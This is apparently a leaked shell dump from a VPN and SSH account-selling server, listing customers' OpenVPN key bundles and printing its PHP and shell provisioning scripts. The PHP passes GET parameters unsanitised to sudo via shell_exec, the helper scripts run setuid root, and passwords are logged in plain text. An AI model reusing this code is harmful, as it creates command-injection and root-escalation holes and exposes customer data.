-rw-r--r-- 1 root root 3403 Nov 26 12:28 chiller133713287_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Dec 29 11:22 chiller13378063_OPENVPN.tgz
-rw-r--r-- 1 root root 3409 Sep 10 00:34 chip998558_OPENVPN.tgz
-rw-r--r-- 1 root root 3611 Dec 7 09:16 conviction28712_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Oct 28 01:20 conviction6444_OPENVPN.tgz
-rw-r--r-- 1 root root 3623 Jul 8 2010 coolio13949_OPENVPN.tgz
-rw-r--r-- 1 root root 3575 Sep 5 22:43 crack9164_OPENVPN.tgz
-rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh
-rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh
-rw-r--r-- 1 root root 3412 Jul 17 20:49 crypt012465_OPENVPN.tgz
-rw-r--r-- 1 root root 3569 Oct 27 16:38 cryptus4764_OPENVPN.tgz
-rw-r--r-- 1 root root 3598 Sep 11 19:15 cunit15618415_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Aug 11 14:44 cunit15619893_OPENVPN.tgz
-rw-r--r-- 1 root root 3593 Nov 9 23:03 cunit15624106_OPENVPN.tgz
-rw-r--r-- 1 root root 3565 Jul 23 15:14 d0ne0ne32695_OPENVPN.tgz
-rw-r--r-- 1 root root 3607 Dec 30 22:11 darkt0wn15874_OPENVPN.tgz
-rw-r--r-- 1 root root 3611 Nov 26 19:37 darkt0wn3662_OPENVPN.tgz
-rw-r--r-- 1 root root 3423 Jun 11 2010 dasemih10582_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Aug 9 03:01 denniswolf15380_OPENVPN.tgz
-rw-r--r-- 1 root root 3611 Sep 8 17:06 denniswolf975_OPENVPN.tgz
-rw-r--r-- 1 root root 3611 May 31 2010 desaster30502_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Jul 10 15:33 det0x10826_OPENVPN.tgz
-rw-r--r-- 1 root root 3614 Jun 6 2010 det0x25144_OPENVPN.tgz
-rw-r--r-- 1 root root 3607 May 16 2010 det0x6693_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Dec 5 20:40 dex9030410_OPENVPN.tgz
-rw-r--r-- 1 root root 3405 Aug 29 19:38 dinara3242_OPENVPN.tgz
-rw-r--r-- 1 root root 3603 Aug 18 17:42 docscanner11883_OPENVPN.tgz
-rw-r--r-- 1 root root 3600 Dec 10 20:19 docscanner15891_OPENVPN.tgz
-rw-r--r-- 1 root root 3612 Oct 24 17:48 docscanner6161_OPENVPN.tgz
-rw-r--r-- 1 root root 3602 Oct 22 14:14 dome250310063_OPENVPN.tgz
-rw-r--r-- 1 root root 3407 Aug 24 16:08 donkey17577_OPENVPN.tgz
-rw-r--r-- 1 root root 3594 Nov 24 19:26 dpgc201011939_OPENVPN.tgz
-rw-r--r-- 1 root root 3422 Nov 7 23:02 dreckz7739_OPENVPN.tgz
-rw-r--r-- 1 root root 3605 Nov 22 18:25 drhandel18818_OPENVPN.tgz
-rw-r--r-- 1 root root 3410 Nov 27 11:04 drweed7100_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Nov 19 01:43 duden16363_OPENVPN.tgz
-rw-r--r-- 1 root root 3578 Oct 27 22:52 dudex20927_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Sep 12 18:50 dudex29255_OPENVPN.tgz
-rw-r--r-- 1 root root 3439 Jun 1 2010 e5e1llo30858_OPENVPN.tgz
-rw-r--r-- 1 root root 3573 Nov 4 23:11 eater15817_OPENVPN.tgz
-rw-r--r-- 1 root root 3418 Oct 27 19:21 eddinc12916_OPENVPN.tgz
-rw-r--r-- 1 root root 3581 Jan 3 15:05 elektro27327_OPENVPN.tgz
-rw-r--r-- 1 root root 3560 Nov 30 15:30 elektro6996_OPENVPN.tgz
-rw-r--r-- 1 root root 3585 Jul 15 00:05 elit327890_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Nov 18 12:14 epoepo25324_OPENVPN.tgz
-rw-r--r-- 1 root root 3600 Jul 14 20:26 f1resp1n9199_OPENVPN.tgz
-rw-r--r-- 1 root root 3589 Nov 8 01:59 finnq10545_OPENVPN.tgz
-rw-r--r-- 1 root root 3426 Oct 23 21:19 fluxay4913_OPENVPN.tgz
-rw-r--r-- 1 root root 3576 Sep 4 01:34 forza12423_OPENVPN.tgz
-rw-r--r-- 1 root root 3599 Aug 24 21:30 fragezeichen14241_OPENVPN.tgz
-rw-r--r-- 1 root root 3602 Oct 5 16:36 fragezeichen3542_OPENVPN.tgz
-rw-r--r-- 1 root root 3603 Nov 26 23:39 frankylo18404_OPENVPN.tgz
-rw-r--r-- 1 root root 3423 Nov 6 03:30 freaky11488_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Nov 29 12:11 freshestman14998_OPENVPN.tgz
-rw-r--r-- 1 root root 3416 Sep 7 02:44 freshestman20055_OPENVPN.tgz
-rw-r--r-- 1 root root 3410 Oct 15 15:11 freshestman28233_OPENVPN.tgz
-rw-r--r-- 1 root root 3611 Nov 16 01:27 fuckdawn12660_OPENVPN.tgz
-rw-r--r-- 1 root root 3417 Jul 20 01:30 galaxi12741_OPENVPN.tgz
-rw-r--r-- 1 root root 3410 Jul 19 22:52 galaxi15585_OPENVPN.tgz
-rw-r--r-- 1 root root 3418 Oct 2 23:53 galaxi18086_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Oct 30 02:40 gehtes5036_OPENVPN.tgz
-rw-r--r-- 1 root root 3408 Oct 28 05:45 genetik1015054_OPENVPN.tgz
-rw-r--r-- 1 root root 3606 Jun 8 2010 godfella23150_OPENVPN.tgz
-rw-r--r-- 1 root root 3418 Nov 3 00:53 ground22054_OPENVPN.tgz
-rw-r--r-- 1 root root 3577 Sep 22 02:09 groundy30694_OPENVPN.tgz
-rw-r--r-- 1 root root 3423 Aug 4 00:04 h2d2e218599_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Aug 6 19:39 h3l0x29397_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Jun 28 2010 h3l0x3097_OPENVPN.tgz
-rw-r--r-- 1 root root 3612 May 27 2010 h3l0x31602_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Oct 16 21:20 h3l0x32259_OPENVPN.tgz
-rw-r--r-- 1 root root 3576 Sep 6 23:03 h3l0x4320_OPENVPN.tgz
-rw-r--r-- 1 root root 3416 Dec 6 13:04 habadu5745_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Sep 22 11:39 hackbart231851_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Nov 13 22:57 hackbart24778_OPENVPN.tgz
-rw-r--r-- 1 root root 3607 Oct 31 23:11 hackoman8853_OPENVPN.tgz
-rw-r--r-- 1 root root 3592 Aug 18 15:47 haddemann1235295_OPENVPN.tgz
-rw-r--r-- 1 root root 3593 Jul 12 15:15 hallo12322143_OPENVPN.tgz
-rw-r--r-- 1 root root 3416 Sep 4 01:51 hallo50505023476_OPENVPN.tgz
-rw-r--r-- 1 root root 3596 Nov 28 20:53 hans200020336_OPENVPN.tgz
-rw-r--r-- 1 root root 3407 Dec 4 19:35 hanshans12322721_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Sep 18 18:05 hanswurst4277_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Nov 20 14:42 hanswurst961_OPENVPN.tgz
-rw-r--r-- 1 root root 3615 Nov 4 02:00 haooosii22019_OPENVPN.tgz
-rw-r--r-- 1 root root 3628 Jul 8 2010 hasenp0wer1224_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Jul 12 16:53 hexst4tic15575_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Nov 6 17:30 hexst4tic20328_OPENVPN.tgz
-rw-r--r-- 1 root root 3413 Sep 25 12:59 hexst4tic22131_OPENVPN.tgz
-rw-r--r-- 1 root root 3391 Aug 23 16:21 hexst4tic24446_OPENVPN.tgz
-rw-r--r-- 1 root root 3635 Jun 9 2010 hexst4tic31381_OPENVPN.tgz
-rw-r--r-- 1 root root 3396 Jul 12 02:43 hexst4tic7086_OPENVPN.tgz
-rw-r--r-- 1 root root 3396 Oct 26 02:49 heyhey12325893_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Jan 2 23:36 hi31757_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Dec 8 16:47 hung23046577_OPENVPN.tgz
-rw-r--r-- 1 root root 3404 Oct 20 00:23 hushbaits3027_OPENVPN.tgz
-rw-r--r-- 1 root root 3407 Dec 1 09:21 hushbaits8016_OPENVPN.tgz
-rw-r--r-- 1 root root 3437 Jul 2 2010 ibrains20948_OPENVPN.tgz
-rw-r--r-- 1 root root 3564 Nov 27 22:57 illegal9593_OPENVPN.tgz
-rw-r--r-- 1 root root 3 May 11 2010 index.htm
-rw-r--r-- 1 root root 2 Sep 17 03:05 index.html
-rw-r--r-- 1 root root 3634 Jul 11 16:09 inexcussus16748_OPENVPN.tgz
-rw-r--r-- 1 root root 3574 Jul 25 20:18 j9ker8731371_OPENVPN.tgz
-rw-r--r-- 1 root root 3567 Oct 30 17:44 jack12330743_OPENVPN.tgz
-rw-r--r-- 1 root root 3403 Aug 5 00:16 jiansa17539_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Nov 25 20:03 johan12328730_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Jun 18 2010 johny3288_OPENVPN.tgz
-rw-r--r-- 1 root root 3584 Aug 20 15:20 jokereloaded3875_OPENVPN.tgz
-rw-r--r-- 1 root root 3607 May 11 2010 juden20060_OPENVPN.tgz
-rw-r--r-- 1 root root 3593 Nov 28 11:39 juegoray1353_OPENVPN.tgz
-rw-r--r-- 1 root root 3408 Nov 9 17:01 juicestin20280_OPENVPN.tgz
-rw-r--r-- 1 root root 3423 Nov 21 20:15 juliasutter2672_OPENVPN.tgz
-rw-r--r-- 1 root root 3420 Oct 24 18:42 kaiser6131_OPENVPN.tgz
-rw-r--r-- 1 root root 3561 Jul 16 01:38 kaliber14521_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Dec 10 21:41 kalle4534_OPENVPN.tgz
-rw-r--r-- 1 root root 3619 Jul 8 2010 kdkdkd23140_OPENVPN.tgz
-rw-r--r-- 1 root root 3396 Dec 10 19:17 kevin4ual20601_OPENVPN.tgz
-rw-r--r-- 1 root root 3614 May 17 2010 keystyle14572_OPENVPN.tgz
-rw-r--r-- 1 root root 3397 Oct 22 02:19 kingding114185_OPENVPN.tgz
-rw-r--r-- 1 root root 3573 Dec 12 17:04 kingpok30006_OPENVPN.tgz
-rw-r--r-- 1 root root 3577 Oct 19 14:30 kirmi16980_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Sep 10 11:50 kirmi17897_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Aug 3 12:32 kirmi21804_OPENVPN.tgz
-rw-r--r-- 1 root root 3584 Dec 8 12:39 kirmi24669_OPENVPN.tgz
-rw-r--r-- 1 root root 3394 Jul 19 15:09 kitanamea14934_OPENVPN.tgz
-rw-r--r-- 1 root root 3564 Sep 13 20:16 klaudio18199_OPENVPN.tgz
-rw-r--r-- 1 root root 3572 Oct 13 23:44 knochen12287_OPENVPN.tgz
-rw-r--r-- 1 root root 3581 Aug 26 17:50 kobra25894_OPENVPN.tgz
-rw-r--r-- 1 root root 3584 Nov 11 19:06 kobra28854_OPENVPN.tgz
-rw-r--r-- 1 root root 3401 Sep 2 22:18 koksi13379157_OPENVPN.tgz
-rw-r--r-- 1 root root 3606 Sep 22 23:26 kollegah14227_OPENVPN.tgz
-rw-r--r-- 1 root root 3603 Nov 19 17:54 kollegah19696_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Jul 15 18:05 kollegah9876_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Jul 21 15:55 kopfnuss1233390_OPENVPN.tgz
-rw-r--r-- 1 root root 3578 Nov 30 09:05 kstARRR29974_OPENVPN.tgz
-rw-r--r-- 1 root root 3416 Dec 15 15:22 lacezl11349_OPENVPN.tgz
-rw-r--r-- 1 root root 3572 Jul 15 14:07 lafesse135_OPENVPN.tgz
-rw-r--r-- 1 root root 3573 Jul 17 21:19 larusso24610_OPENVPN.tgz
-rw-r--r-- 1 root root 3605 Dec 10 05:07 latestnews13082_OPENVPN.tgz
-rw-r--r-- 1 root root 3603 Oct 30 07:58 latestnews14060_OPENVPN.tgz
-rw-r--r-- 1 root root 3418 May 15 2010 letharg30647_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Jul 20 01:31 levision22813_OPENVPN.tgz
-rw-r--r-- 1 root root 3595 Jul 19 01:07 levision26609_OPENVPN.tgz
drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd
-rw-r--r-- 1 root root 3621 May 14 2010 lilg9427854_OPENVPN.tgz
-rw-r--r-- 1 root root 3570 Jul 29 03:31 lolilol5992_OPENVPN.tgz
-rw-r--r-- 1 root root 3589 Oct 1 00:06 loopi2628_OPENVPN.tgz
-rw-r--r-- 1 root root 3599 Sep 5 22:47 lorenzstyler30043_OPENVPN.tgz
-rw-r--r-- 1 root root 3588 Sep 9 15:14 lpboy15438_OPENVPN.tgz
-rw-r--r-- 1 root root 3584 Nov 28 11:20 lpboy32147_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Dec 21 20:30 luden29299_OPENVPN.tgz
-rw-r--r-- 1 root root 3608 Jul 11 17:42 lykantos5842_OPENVPN.tgz
-rw-r--r-- 1 root root 3605 Dec 2 11:04 mablutze15734_OPENVPN.tgz
-rw-r--r-- 1 root root 3614 Jan 2 11:48 mablutze20061_OPENVPN.tgz
-rw-r--r-- 1 root root 3618 Jul 2 2010 maddin9319817_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Nov 1 16:20 makko10328_OPENVPN.tgz
-rw-r--r-- 1 root root 3585 Aug 13 22:07 makko15206_OPENVPN.tgz
-rw-r--r-- 1 root root 3616 Jun 12 2010 makko27543_OPENVPN.tgz
-rw-r--r-- 1 root root 3606 Dec 19 12:10 malakas23496_OPENVPN.tgz
-rw-r--r-- 1 root root 3402 Oct 26 03:21 malakas32654_OPENVPN.tgz
-rw-r--r-- 1 root root 3570 Dec 5 13:21 malikop20421_OPENVPN.tgz
-rw-r--r-- 1 root root 3602 Aug 8 02:15 mani199323876_OPENVPN.tgz
-rw-r--r-- 1 root root 3577 Jul 13 00:29 maury27248_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Aug 20 18:57 mcott19555_OPENVPN.tgz
-rw-r--r-- 1 root root 3572 Oct 6 18:19 mcott7073_OPENVPN.tgz
-rw-r--r-- 1 root root 3587 Jul 13 11:39 mcott9631_OPENVPN.tgz
-rw-r--r-- 1 root root 3566 Aug 25 06:39 mesrine15658_OPENVPN.tgz
-rw-r--r-- 1 root root 3576 Oct 12 18:34 micki2219130_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Oct 4 19:37 mieze25868_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Jul 30 23:15 mrfranzi20317_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Jul 18 22:23 murth934_OPENVPN.tgz
-rw-r--r-- 1 root root 3405 Oct 17 04:31 muruk20094696_OPENVPN.tgz
-rw-r--r-- 1 root root 3611 Dec 17 13:08 muschigirl23085_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Sep 22 12:38 muschigirl28807_OPENVPN.tgz
-rw-r--r-- 1 root root 3570 Oct 4 22:31 n1C3A1r22801_OPENVPN.tgz
-rw-r--r-- 1 root root 3607 Nov 26 13:10 n3ot0xin7144_OPENVPN.tgz
-rw-r--r-- 1 root root 3409 Dec 21 21:57 nate2331513_OPENVPN.tgz
-rw-r--r-- 1 root root 3615 Jun 8 2010 navyraiser2256_OPENVPN.tgz
-rw-r--r-- 1 root root 3585 Aug 25 00:32 nemiz8610_OPENVPN.tgz
-rw-r--r-- 1 root root 3635 Jun 9 2010 nightmar330255_OPENVPN.tgz
-rw-r--r-- 1 root root 3621 Jul 11 18:06 numo874898_OPENVPN.tgz
-rw-r--r-- 1 root root 3592 Dec 2 14:11 obama12323355_OPENVPN.tgz
-rw-r--r-- 1 root root 3613 Jun 11 2010 obama12325666_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Oct 15 20:31 obama12325914_OPENVPN.tgz
-rw-r--r-- 1 root root 3420 Dec 19 18:26 oicw913539_OPENVPN.tgz
-rw-r--r-- 1 root root 3565 Aug 11 00:48 oxford123948_OPENVPN.tgz
-rw-r--r-- 1 root root 3629 Jun 2 2010 p0rt3m22208_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Nov 5 01:41 pURRRR806_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Dec 6 07:28 pan1c17070_OPENVPN.tgz
-rw-r--r-- 1 root root 3593 Oct 26 10:28 pan1c31582_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 May 25 2010 pann021887_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Dec 7 22:03 papa421249_OPENVPN.tgz
-rw-r--r-- 1 root root 3432 Jun 14 2010 paranoy21693_OPENVPN.tgz
-rw-r--r-- 1 root root 3415 Dec 1 18:16 peters7031_OPENVPN.tgz
-rw-r--r-- 1 root root 3618 Jun 8 2010 plu5554340_OPENVPN.tgz
-rw-r--r-- 1 root root 3613 Jun 15 2010 powerarm9390_OPENVPN.tgz
-rw-r--r-- 1 root root 3408 Jul 16 00:19 puttin29618_OPENVPN.tgz
-rw-r--r-- 1 root root 3575 Nov 22 18:53 r0fLyyy20540_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Jul 20 20:45 recoilcontrol13838_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Oct 31 05:55 recoilcontrol14436_OPENVPN.tgz
-rw-r--r-- 1 root root 3605 Jul 20 23:48 recoilcontrol16539_OPENVPN.tgz
-rw-r--r-- 1 root root 3589 Jul 20 20:45 recoilcontrol20256_OPENVPN.tgz
-rw-r--r-- 1 root root 3595 Aug 24 23:41 recoilcontrol20435_OPENVPN.tgz
-rw-r--r-- 1 root root 3595 Sep 25 22:59 recoilcontrol22600_OPENVPN.tgz
-rw-r--r-- 1 root root 3602 Dec 10 06:48 recoilcontrol24867_OPENVPN.tgz
-rw-r--r-- 1 root root 3578 Dec 7 12:24 reideen31055_OPENVPN.tgz
-rw-r--r-- 1 root root 3565 Oct 27 16:49 reideen4694_OPENVPN.tgz
-rw-r--r-- 1 root root 3429 Jun 13 2010 rew133711075_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Dec 4 15:25 rich9024721_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Dec 19 15:48 ripit25423_OPENVPN.tgz
-rw-r--r-- 1 root root 3392 Sep 25 15:40 romulus8910580_OPENVPN.tgz
-rw-r--r-- 1 root root 3606 Jun 5 2010 s1cks1ck7058_OPENVPN.tgz
-rw-r--r-- 1 root root 3425 Jun 27 2010 saidone3692_OPENVPN.tgz
-rw-r--r-- 1 root root 3432 Jul 10 10:52 santaly22171_OPENVPN.tgz
-rw-r--r-- 1 root root 3428 May 12 2010 schmali30094_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Jul 5 2010 schmali8853_OPENVPN.tgz
-rw-r--r-- 1 root root 3589 Nov 15 21:35 sh0ck11639_OPENVPN.tgz
-rw-r--r-- 1 root root 3571 Nov 1 01:54 shitpro46_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Aug 26 22:09 shizomitzu29204_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Dec 3 09:02 shore17470_OPENVPN.tgz
-rw-r--r-- 1 root root 3407 Dec 7 14:34 sidosido1233174_OPENVPN.tgz
-rw-r--r-- 1 root root 3613 Jul 22 20:39 sirmaliq9030397_OPENVPN.tgz
-rw-r--r-- 1 root root 3407 Dec 2 07:36 slic3menic38769_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Nov 10 22:47 snowghost17906_OPENVPN.tgz
-rw-r--r-- 1 root root 3561 Nov 28 08:57 someone1895_OPENVPN.tgz
-rw-r--r-- 1 root root 3434 Jun 25 2010 someone22369_OPENVPN.tgz
-rw-r--r-- 1 root root 3593 Aug 4 23:47 souliloquist11153_OPENVPN.tgz
-rw-r--r-- 1 root root 3423 Jul 4 2010 souliloquist12695_OPENVPN.tgz
-rw-r--r-- 1 root root 3594 Aug 4 23:48 souliloquist25034_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Nov 8 03:26 spran32726_OPENVPN.tgz
-rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog
-rw-r--r-- 1 root root 3579 Aug 15 01:11 st0ne24184_OPENVPN.tgz
-rw-r--r-- 1 root root 3573 Oct 31 00:13 stage666761_OPENVPN.tgz
-rw-r--r-- 1 root root 3409 Aug 2 21:41 stevy265130526_OPENVPN.tgz
-rw-r--r-- 1 root root 3568 Oct 14 22:12 store2410563_OPENVPN.tgz
-rw-r--r-- 1 root root 3600 Sep 7 14:57 stronger8718968_OPENVPN.tgz
-rw-r--r-- 1 root root 3419 Oct 4 01:35 styler12729_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Nov 28 15:10 styles16225_OPENVPN.tgz
-rw-r--r-- 1 root root 3424 Oct 18 07:43 styles18650_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Sep 29 17:37 suc4life19475_OPENVPN.tgz
-rw-r--r-- 1 root root 3597 Aug 24 20:28 suc4life9834_OPENVPN.tgz
-rw-r--r-- 1 root root 3625 Jun 20 2010 sudeki25957_OPENVPN.tgz
-rw-r--r-- 1 root root 3572 Dec 23 13:58 sunrise20870_OPENVPN.tgz
-rw-r--r-- 1 root root 3401 Nov 29 12:31 supersixten16431_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Nov 8 19:05 t0xus32177_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Sep 2 23:25 t0xus6444_OPENVPN.tgz
-rw-r--r-- 1 root root 3400 Nov 24 21:34 tahBOUNTY24202_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Nov 12 19:12 tanjo21492_OPENVPN.tgz
-rw-r--r-- 1 root root 3576 Sep 9 18:20 tanjo28945_OPENVPN.tgz
-rw-r--r-- 1 root root 3564 Nov 27 10:06 termate24530_OPENVPN.tgz
-rw-r--r-- 1 root root 4 Sep 16 23:51 test
-rw-r--r-- 1 root root 3575 Dec 5 09:06 test5699246_OPENVPN.tgz
-rw-r--r-- 1 root root 3587 Dec 29 19:18 teste8025_OPENVPN.tgz
-rw-r--r-- 1 root root 3623 Jun 11 2010 th3sh4dow15637_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Aug 29 03:36 th3sh4dow26538_OPENVPN.tgz
-rw-r--r-- 1 root root 3404 Jul 29 01:36 th3sh4dow7901_OPENVPN.tgz
-rw-r--r-- 1 root root 3427 Nov 1 18:55 theDog31533_OPENVPN.tgz
-rw-r--r-- 1 root root 3620 May 17 2010 theaSh5027_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Jan 3 20:24 thehen8300_OPENVPN.tgz
-rw-r--r-- 1 root root 3401 Nov 29 06:13 tijgertje12595_OPENVPN.tgz
-rw-r--r-- 1 root root 3608 May 13 2010 traden9010098_OPENVPN.tgz
-rw-r--r-- 1 root root 3418 Nov 8 02:41 tripit30242_OPENVPN.tgz
-rw-r--r-- 1 root root 3612 Oct 21 03:49 turboprinz18543_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Oct 19 23:35 twist2275_OPENVPN.tgz
-rw-r--r-- 1 root root 3430 May 31 2010 ucitsme12769_OPENVPN.tgz
-rw-r--r-- 1 root root 3610 Nov 24 22:52 ultrawilli21542_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Oct 15 00:46 upperfreak1495_OPENVPN.tgz
-rw-r--r-- 1 root root 3575 Jul 14 13:30 vpn2420339_OPENVPN.tgz
-rw-r--r-- 1 root root 3580 Nov 3 20:57 vpn2429681_OPENVPN.tgz
-rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog
-rw-r--r-- 1 root root 3591 Nov 10 04:35 w333d21697_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Nov 6 03:41 w333d26767_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Oct 22 01:09 w333d31139_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Sep 22 02:05 w333d4383_OPENVPN.tgz
-rw-r--r-- 1 root root 3599 May 11 2010 w333d8639_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Dec 4 09:33 w333d9676_OPENVPN.tgz
-rw-r--r-- 1 root root 3620 Jun 11 2010 war10ck133710772_OPENVPN.tgz
-rw-r--r-- 1 root root 3435 Aug 20 16:41 warmachine133724023_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Sep 3 04:18 weedneger31561_OPENVPN.tgz
-rw-r--r-- 1 root root 3418 Dec 5 08:42 weeman8818_OPENVPN.tgz
-rw-r--r-- 1 root root 3433 Jun 16 2010 werther15618_OPENVPN.tgz
-rw-r--r-- 1 root root 3591 Nov 23 19:41 winkel722094_OPENVPN.tgz
-rw-r--r-- 1 root root 3600 Aug 3 16:02 winkelmann725337_OPENVPN.tgz
-rw-r--r-- 1 root root 3585 Aug 15 16:31 woorm6760_OPENVPN.tgz
-rw-r--r-- 1 root root 3603 Oct 23 04:28 wortermilk31260_OPENVPN.tgz
-rw-r--r-- 1 root root 3597 Dec 13 19:34 wtfvpn2417141_OPENVPN.tgz
-rw-r--r-- 1 root root 3419 Aug 27 04:03 ww2dd28375_OPENVPN.tgz
-rw-r--r-- 1 root root 3580 Oct 15 16:33 x220x7914_OPENVPN.tgz
-rw-r--r-- 1 root root 3567 Dec 16 07:03 xStream14196_OPENVPN.tgz
-rw-r--r-- 1 root root 3572 Nov 9 01:51 xStream25123_OPENVPN.tgz
-rw-r--r-- 1 root root 3569 Sep 30 15:38 xStream27135_OPENVPN.tgz
-rw-r--r-- 1 root root 3425 Jul 8 2010 xStream9518_OPENVPN.tgz
-rw-r--r-- 1 root root 3575 Aug 18 03:10 xStream9635_OPENVPN.tgz
-rw-r--r-- 1 root root 3573 Sep 17 01:50 xeqtion7314_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Nov 27 14:45 xx1337xx4652_OPENVPN.tgz
-rw-r--r-- 1 root root 3608 Sep 9 21:16 xxkev200xx24744_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Jul 17 07:25 zer00063_OPENVPN.tgz
-rw-r--r-- 1 root root 3638 May 15 2010 zetinator10057_OPENVPN.tgz
# ls -la | grep -v tgz
total 2388
drwxr-xr-x 3 root root 36864 Jan 4 20:32 .
drwxr-xr-x 14 root root 4096 Feb 2 2010 ..
-rw------- 1 root root 1024 Jan 4 20:17 .rnd
-rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php
-rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php
-rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh
-rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh
-rw-r--r-- 1 root root 3 May 11 2010 index.htm
-rw-r--r-- 1 root root 2 Sep 17 03:05 index.html
drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd
-rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog
-rw-r--r-- 1 root root 4 Sep 16 23:51 test
-rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog
# #Warning: dumb code ahead
# cat addSSHuser.php
<?php
if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>");
// visudo www-data ALL=NOPASSWD: /var/www/createSSHsocks.sh
if(isset($_GET['user']) && isset($_GET['pass']) && isset($_GET['date']))
{
$user = $_GET['user'];
$pass = $_GET['pass'];
$date = $_GET['date'];
echo shell_exec("sudo /var/www/createSSHsocks.sh $user $pass $date");
}
?>
# cat createSSHsocks.sh
#!/bin/sh
if [ $# -lt 3 ]
then
echo $0 user pass expDate
exit
fi
if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$"
then
echo "Invalid User"
exit
fi
if ! echo $2 | grep -q -e "^[a-zA-Z0-9]*$"
then
echo "Invalid Pass"
exit
fi
if ! echo $3 | grep -q -E "[0-9]{4}-[0-9]{2}-[0-9]{2}"
then
echo "Invalid ExpDate"
exit
fi
user=$1
pass=$2
exp=$3
echo "`date`: $user $pass $date" >> sshCreateLog
if [ ! -d /home/SSHUSER ]
then
echo "Creating /home/SSHUSER"
mkdir /home/SSHUSER
fi
crpass=$(perl -e"`echo \"print crypt(\\\"$pass\\\", \\\"itsMySalt\\\")\"`")
deluser $user
useradd --home /home/SSHUSER --expiredate $exp --password $crpass --shell /usr/sbin/nologin $user
$ cat addVPNuser.php
<?php
if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>");
// visudo www-data ALL=NOPASSWD: /var/www/createVPN.sh
if(isset($_GET['user']))
{
$user = $_GET['user'];
echo shell_exec("sudo /var/www/createVPN.sh $user 2> /dev/null");
}
?>
# cat createVPN.sh
#!/bin/sh
if [ $# -lt 1 ]
then
echo $0 user
exit
fi
if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$"
then
echo "Invalid User"
exit
fi
user=$1
dir=`pwd`
echo "`date`: $user" >> vpnCreateLog
cd /etc/openvpn/easy-rsa/2.0 #MAD AES-1024 RIGHT HEEEERE
source ./vars >> /dev/null 2> /dev/null
./build-key --batch $user >> /dev/null 2> /dev/null
fn=`echo "${user}${RANDOM}_OPENVPN.tgz"`
cd keys/
sed -e "s/_NAME_/$user/g" client.conf > ${user}_OVPN.ovpn
